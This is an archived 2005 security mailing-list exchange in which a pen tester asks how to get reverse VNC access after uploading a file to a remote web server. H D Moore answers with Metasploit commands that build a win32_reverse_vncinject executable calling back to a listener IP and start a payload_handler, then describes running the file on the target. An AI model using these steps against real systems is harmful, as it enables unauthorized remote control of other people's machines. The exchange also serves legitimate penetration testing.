mailing list archives
Reverse Shell / VNC from a writeable directory on a remote site
From: hdm at metasploit.com (H D Moore)
Date: Fri, 5 Aug 2005 15:17:22 -0500
You *might* be able to use msfpayload and the payload_handler exploit to
do this, but for reasons I have yet to investigate, the VNC payload isn't
working well under the exe loader. The process for this is:
1) Generate an executable:
$ msfpayload win32_reverse_vncinject LHOST=126.96.36.199 LPORT=3333 X > test.exe
2) Copy the executable to your target somehow.
3) Start up the Framework with the payload_handler exploit module:
$ msfcli payload_handler PAYLOAD=win32_reverse_vncinject LHOST=188.8.131.52
4) Execute the standalone payload stager on the target system.
5) Enjoy your happy VNC access, assuming you have write access to the
current interactive desktop.
This process has been tested with most of the win32 Metasploit payloads,
but YMMV. This is a handy way to load up meterpreter via client-side
execution bugs too ;-)
On Friday 05 August 2005 06:16, AsTriXs wrote:
I have found a few writable directories on a remote web server on
which I am doing a Pen-Test.
I have been able to upload a file using PUT command. How do I setup a
reversell of a VNC from this stage? Does Metasploit provide an option?
What would be the procedure to achieve the same?